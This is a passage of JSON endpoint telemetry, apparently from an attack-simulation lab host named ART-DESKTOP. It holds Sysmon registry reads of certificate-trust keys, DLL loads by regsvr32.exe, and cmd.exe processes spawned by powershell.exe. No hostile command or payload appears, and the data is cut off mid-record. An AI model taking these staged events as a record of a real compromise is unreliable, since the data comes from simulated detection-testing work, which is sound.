"timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236200016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "terminate", - "timestamp": 131883573236200016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\System32\\winspool.drv", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3696, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573236439984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 